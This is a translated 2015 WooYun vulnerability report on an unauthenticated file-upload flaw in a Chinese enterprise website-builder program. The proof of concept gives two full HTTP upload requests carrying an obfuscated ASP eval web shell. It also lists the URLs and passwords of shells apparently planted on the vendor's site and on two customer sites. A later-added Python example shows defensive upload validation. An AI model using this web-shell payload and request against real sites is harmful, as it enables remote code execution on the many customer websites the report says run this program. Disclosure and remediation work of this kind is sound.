Vulnerability summary

Defect ID: wooyun-2015-089352

Title: Generic upload vulnerability in an enterprise website-builder program allows getshell without login

Related vendor: 一诺互联

Author: Ch丶0nly

Submitted: 2015-01-04 12:36

Fix deadline: 2015-04-04 12:38

Public disclosure: 2015-04-04 12:38

Vulnerability type: file upload leading to arbitrary code execution

Severity: High

Self-assessed Rank: 10

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-01-04: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed.
2015-04-04: The vendor has actively ignored the vulnerability; details disclosed to the public.

Brief description:

Generic upload vulnerability in an enterprise website-builder program allows getshell without login

Detailed description:

Generic upload vulnerability in an enterprise website-builder program allows getshell without login.
http://www.ynhl.net 一诺互联 is a fairly large enterprise website-building company with more than ten thousand customer sites built on this program, so the impact of this vulnerability is very wide.
More customer sites are listed at http://www.ynhl.net/case/

Proof of vulnerability:

The problem is an upload function in the site program. More customer sites are listed at http://www.ynhl.net/case/
The vendor's own site, http://www.ynhl.net, is used for the demonstration below.
Vulnerable URL: http://www.ynhl.net/admin/fupload.asp?useForm=form1&prevImg=showImg&upUrl=tp&ImgS=&ImgW=&ImgH=&reItem=rePic
The upload filtering is incomplete, so arbitrary files can be uploaded. The only prerequisite is that the target site must first be added to the browser's trusted sites for the upload control to work.

[Screenshot: the upload form]


Then upload a file and capture the request with Burp:
http://www.ynhl.net/admin/fupload.asp?useForm=form1&prevImg=showImg&upUrl=tp&ImgS=&ImgW=&ImgH=&reItem=rePic
Change the file type at this point to asp.

[Screenshot: the captured request in Burp]


Attached request:

POST /admin/fupaction.asp HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.ynhl.net/admin/fupload.asp?useForm=form1&prevImg=showImg&upUrl=tp&ImgS=&ImgW=&ImgH=&reItem=rePic
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
Content-Type: multipart/form-data; boundary=---------------------------7de2902b3015a
Accept-Encoding: gzip, deflate
Host: www.ynhl.net
Content-Length: 828
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASPSESSIONIDSCRQDTRR=BJCDJKGDHMFDAAKLGFHONOKE; bdshare_firstime=1419171865847; ASPSESSIONIDAASQCRST=MOGFKEJDPIKEBEFGJPCEFHPL; ASPSESSIONIDCARRCTTS=GAJPMOLDEIDBNGOCLGJECFPC; CNZZDATA5076377=cnzz_eid%3D1944653864-1419168501-http%253A%252F%252Fwww.baidu.com%252F%26ntime%3D1419215083
-----------------------------7de2902b3015a
Content-Disposition: form-data; name="upfile"; filename="C:\Documents and Settings\Administrator\桌面\asp.asp"
Content-Type: text/plain
1<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
-----------------------------7de2902b3015a
Content-Disposition: form-data; name="Submit"
开始上传
-----------------------------7de2902b3015a
Content-Disposition: form-data; name="useForm"
form1
-----------------------------7de2902b3015a
Content-Disposition: form-data; name="upUrl"
tp
-----------------------------7de2902b3015a
Content-Disposition: form-data; name="prevImg"
showImg
-----------------------------7de2902b3015a
Content-Disposition: form-data; name="reItem"
rePic
-----------------------------7de2902b3015a--


[Screenshot: upload result]


As the screenshot above shows, the upload succeeded: http://www.ynhl.net/admin/tp/asp0.asp, password -7
http://www.bohome.cn/admin/tp/1111.asp, password cai

[Screenshot: uploaded file on the customer site]


http://www.lubeian.com.cn/tp/1111.asp, password -7

[Screenshot: uploaded file on the customer site]


POST /fupaction.asp HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.lubeian.com.cn/fupload.asp?useForm=form1&prevImg=showImg&upUrl=tp&ImgS=&ImgW=&ImgH=&reItem=rePic
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
Content-Type: multipart/form-data; boundary=---------------------------7de3d83a290590
Accept-Encoding: gzip, deflate
Host: www.lubeian.com.cn
Content-Length: 835
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASPSESSIONIDASTQBBAB=CPIBHBABLCDPDAFFBEJKMOJE
-----------------------------7de3d83a290590
Content-Disposition: form-data; name="upfile"; filename="C:\Documents and Settings\Administrator\桌面\1111.asp"
Content-Type: text/plain
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
-----------------------------7de3d83a290590
Content-Disposition: form-data; name="Submit"
开始上传
-----------------------------7de3d83a290590
Content-Disposition: form-data; name="useForm"
form1
-----------------------------7de3d83a290590
Content-Disposition: form-data; name="upUrl"
tp
-----------------------------7de3d83a290590
Content-Disposition: form-data; name="prevImg"
showImg
-----------------------------7de3d83a290590
Content-Disposition: form-data; name="reItem"
rePic
-----------------------------7de3d83a290590--



Fix recommendation:

Filter uploads properly.
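The captured requests above show what the server-side handler (fupaction.asp) failed to do: it stored the file under the client-supplied name and extension, and a declared Content-Type of text/plain did not stop an .asp file from landing in the tp directory. The following Python example, added here and not part of the original report or of the vendor's code, shows the checks a replacement handler would need. It parses a multipart/form-data body built with the page's own field names (upfile, useForm, upUrl, prevImg, reItem) and boundary string, keeps only the basename of the IE-style full client path, enforces an extension allowlist, verifies the file's leading bytes against the claimed image type, treats the client-declared Content-Type as untrusted, and stores the file under a random server-chosen name. The allowlist, the magic-byte table, the placeholder file contents and the two sample bodies are all constructed for this example.

```python
import os
import re
import secrets

# Allowlist of extensions the image picker is meant to accept, each paired with
# the leading bytes a file of that type must start with. Assumed for this example.
ALLOWED = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Split a multipart/form-data body into {field: (filename, content-type, payload)}."""
    delim = b"--" + boundary.encode("ascii")
    parts = {}
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        head, _, payload = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        if payload.endswith(b"\r\n"):        # the CRLF before the next delimiter is not data
            payload = payload[:-2]
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        disp = headers.get("content-disposition", "")
        name = re.search(r'name="([^"]*)"', disp)
        fname = re.search(r'filename="([^"]*)"', disp)
        parts[name.group(1) if name else ""] = (
            fname.group(1) if fname else None,
            headers.get("content-type"),
            payload,
        )
    return parts


def validate_upload(filename: str, declared_type: str, payload: bytes) -> str:
    """Return a server-chosen name for an acceptable image upload, or raise ValueError."""
    # IE sends the full client-side path (see the captured request); keep only the basename.
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        raise ValueError(f"extension {ext!r} is not an allowed image type")
    # The declared Content-Type is client-controlled: check it, but never rely on it alone.
    if not (declared_type or "").lower().startswith("image/"):
        raise ValueError(f"declared type {declared_type!r} is not an image")
    if not payload.startswith(ALLOWED[ext]):
        raise ValueError("file content does not match the claimed image type")
    # Never reuse the client filename; a random server-side name cannot be chosen by the uploader.
    return secrets.token_hex(8) + ext


def handle_upload(body: bytes, boundary: str) -> tuple:
    """Validating counterpart of the upload action: ('stored', name) or ('rejected', reason)."""
    parts = parse_multipart(body, boundary)
    if "upfile" not in parts or parts["upfile"][0] is None:
        return ("rejected", "no file field")
    filename, ctype, payload = parts["upfile"]
    try:
        return ("stored", validate_upload(filename, ctype, payload))
    except ValueError as exc:
        return ("rejected", str(exc))


def build_body(boundary: str, filename: str, ctype: str, payload: bytes) -> bytes:
    """Constructed request body using the page's form field names (upfile, useForm, upUrl, ...)."""
    b = ("--" + boundary).encode()
    fields = [("useForm", b"form1"), ("upUrl", b"tp"), ("prevImg", b"showImg"), ("reItem", b"rePic")]
    out = [b + b'\r\nContent-Disposition: form-data; name="upfile"; filename="' + filename.encode()
           + b'"\r\nContent-Type: ' + ctype.encode() + b"\r\n\r\n" + payload + b"\r\n"]
    for name, value in fields:
        out.append(b + b'\r\nContent-Disposition: form-data; name="' + name.encode() + b'"\r\n\r\n' + value + b"\r\n")
    out.append(b + b"--\r\n")
    return b"".join(out)


BOUNDARY = "---------------------------7de2902b3015a"   # boundary string from the captured request

# Constructed sample 1: an .asp upload shaped like the report's request, with a harmless placeholder body.
ASP_UPLOAD = build_body(BOUNDARY, r"C:\Documents and Settings\Administrator\Desktop\asp.asp",
                        "text/plain", b"<% ' placeholder, not a real script %>")
# Constructed sample 2: a file that really starts like a JPEG.
JPG_UPLOAD = build_body(BOUNDARY, r"C:\Users\me\photo.jpg", "image/jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 16)

if __name__ == "__main__":
    print(handle_upload(ASP_UPLOAD, BOUNDARY))   # ('rejected', "extension '.asp' is not an allowed image type")
    print(handle_upload(JPG_UPLOAD, BOUNDARY))   # ('stored', '<16 hex chars>.jpg')
```

The order of the checks matters less than the fact that every one of them is performed on the server: the extension allowlist removes the .asp case from the report, the magic-byte check catches a script renamed to .jpg, and the random stored name means the uploader never learns or chooses the path of what was written. The handler in the report is also reachable without a session, so a real fix would additionally require an authenticated admin session before any of this runs; that check is outside this example.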

Copyright notice: when reposting, please credit the source: Ch丶0nly@WooYun


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively declined to respond.